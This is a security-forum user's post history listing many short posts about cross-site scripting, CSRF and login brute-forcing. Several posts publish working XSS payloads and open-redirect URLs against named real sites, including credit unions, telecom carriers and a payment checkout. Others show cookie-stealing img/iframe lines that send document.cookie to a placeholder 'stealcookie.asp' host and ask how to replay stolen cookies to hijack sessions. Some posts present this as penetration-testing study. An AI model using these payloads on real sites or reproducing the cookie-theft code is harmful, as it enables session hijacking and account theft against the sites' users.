Sla.ckers.org
How robots and spiders are causing issues, how to stop them. We can also talk about Completely Automated Public Turing Test To Tell Computers And Humans Apart - their use, their compliance issues, porn proxies, PWNtcha and other ways to defeat them. 

Current Page: 1 of 1
Results 1 - 24 of 24
7 years ago
sjensen
Mountain America Credit Union http://www.macu.com/home/ "><script>alert('xss');</script> in "Search" box. Midwest United Credit Union http://www.mwucu.com/cgi-bin/search/search.cgi "><script>alert('xss');</script> in "Search" box. United Consumers Credit Union http://www.unitedconsumerscu.com/result.php?Keywords=%22%3E%3Cscri
Forum: Full Disclosure
7 years ago
sjensen
Actually, with a little research and testing I was able to answer my own questions.
Forum: XSS Info
7 years ago
sjensen
Let's assume I can create a persistent xss attack that checks the browser and implements the XHR object. Using this I can execute asynchronous attacks back to the server. Now here's the questions: 1) can I scan the site to find valid pages to request or do I have to know the name of the page/url being requested? 2) assuming a request for a page succeeded (readystate ==4 and status==200) can
Forum: XSS Info
7 years ago
sjensen
Not exactly xss, but nice error messages... http://vonage.com/search_results.php?search_string=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&search.x=8&search.y=11
Forum: Full Disclosure
7 years ago
sjensen
http://att.sbc.com/search/att?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&category=&btnG=Search http://www.cincinnatibell.com/search/default.asp?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=27&y=11 https://market.lucent.com/release/jsp/sso/login.jsp type ("><script>alert('xss');</script>) in the Username field.
Forum: Full Disclosure
7 years ago
sjensen
http://www.netelco.com/redir.php?url=http://sla.ckers.org/
Forum: Full Disclosure
7 years ago
sjensen
http://yellowpages.superpages.com/listings.jsp?N=&C=<script>alert('xss');</script>&STYPE=S&T=&S=ND&PG=L&R=N The above is actually a redirection from http://www22.verizon.com/ http://www.bellsouth.com/ type (</script><script>alert('xss');</script>) in the "Search" box. http://sprint.p.delivery.net/m/p/nxt/reg/cus/ereg.asp?em
Forum: Full Disclosure
7 years ago
sjensen
@rsnake - I found one on AT&T/SBC a day or two ago. I'm going after Vonage...I hate those commercials!
Forum: Full Disclosure
7 years ago
sjensen
http://www.powersportsnetwork.com/redirect.asp?dealercode=1&url=http://sla.ckers.org
Forum: Full Disclosure
7 years ago
sjensen
https://shop.2checkout.com/2co/ search: "><script>alert('xss');</script> http://www.haveninternet.com/search.html search: <script>alert('xss');</script> https://www06.sbc.com/myaccount/Controller?pf=frameworkEntry&e=feMyAccount UserID: "><script>alert('xss');</script>
Forum: Full Disclosure
7 years ago
sjensen
Strange...must be an ASP.NET thing because the window.attachEvent doesn't work. It renders the code to the page, but it doesn't execute it...
Forum: CSRF and Session Info
7 years ago
sjensen
What is the easiest/preferred way of sending the retrieved cookie back to the application to impersonate the user?? I can capture the cookie value, however I'm not clear on exactly how to send that cookie value back to the application in order to demonstrate that the user's session has been hijacked.
Forum: XSS Info
7 years ago
sjensen
Adding the "defer" didn't prevent the error, but that's okay, because by adding that script it actually causes the application to crash anyway... I did another test using xss that locked the application in an infinite loop posting the cookie value to another domain, then doing a history.back, then it reposts, then back, etc...also causing the application to crash...
Forum: CSRF and Session Info
7 years ago
sjensen
I changed the url, still got the same "IE can't open the internet site..." error message, but it did throw the alert with the cookie in it...
Forum: CSRF and Session Info
7 years ago
sjensen
I pasted the above script in but received an "Internet Explorer can't open the internet site." This may be because my company has the ha.ckers.org site blocked. btw, I'm running IE 7.
Forum: CSRF and Session Info
7 years ago
sjensen
Just tried them... The first one (<iframe src="javascript:alert('XSS')"></iframe>) renders the iframe with a 404 page, no alert is executed. The second one (<IMG SRC="" onerror="alert('XSS')">) worked! It threw up the alert box. So the next thing is...how can it be exploited maliciously??
Forum: CSRF and Session Info
7 years ago
sjensen
Yes, I may have mixed up my acronyms. Here's why I ask. The developers in my department use various 3rd party rich textbox controls in their applications. Most I have tested do not allow <script> tags, at least not directly. I haven't come up with too many ways to encode them though... But these 3rd party controls do allow html tags, <br>, <img>, <iframe> so I was curiou
Forum: CSRF and Session Info
7 years ago
sjensen
Is it possible to access cookies through CSRF attacks?? Example: (I haven't gotten these to work) <img src='http://somesite.com/stealcookie.asp?cookie=" + document.cookie + "'> or <iframe src='http://somesite.com/stealcookie.asp?cookie=" + document.cookie + "'> I read on another thread creating an iframe to automatically log a person out, then access
Forum: CSRF and Session Info
7 years ago
sjensen
Basically, anything that could run a brute force or dictionary attack against forms authentication or Basic Auth. I know Paros can't scan a "password" protected area without having those credentials supplied first. However, I'm not sure about other products, such as WebInspect, Acunetix, etc... password policies would be the biggest hurdle.
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
sjensen
@digi7al64, Actually, I think it's deeper than that. Even though you can bypass the validator controls the request itself is still sent and validated through the System.Web.ClientSideScriptingValidation class which would capture any basic XSS attack. I think the vulnerability lies in how a request can be created to not be caught by the System.Web.ClientSideScriptingValidation class. The Sy
Forum: Intro
7 years ago
sjensen
Is anyone aware of any web app scanning tools that can either scan protected areas (without supplying credentials) or run brute force attacks against these areas to gain access. I'm asking this because my company has stated that our sites are immune to web scanning, because all applications require an individual to log in first prior to accessing any "sensitive" information. And they s
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
sjensen
I'm sure with the proper marketing, it can and will become popular because users aren't concerned as much about security as they are with "Oh, that's neat!"
Forum: News and Links
7 years ago
sjensen
The advisory is located at the link below. I'm not sure if the vulnerability is specific to a particular culture setting or not. http://www.niscc.gov.uk/niscc/docs/br-20061020-00711.html?lang=en
Forum: Intro
7 years ago
sjensen
24. Hello
Been reading the forums for a while, was finally able to register (hotmail account never received registration email, so I ended up registering with my work email). My background. I've spent the last 6 years as a web developer, the last 4 doing .NET exclusively. I've been dabbling in web app security for about 3 years now. I start a new job in my department in about 2 weeks, I'll be doing penet
Forum: Intro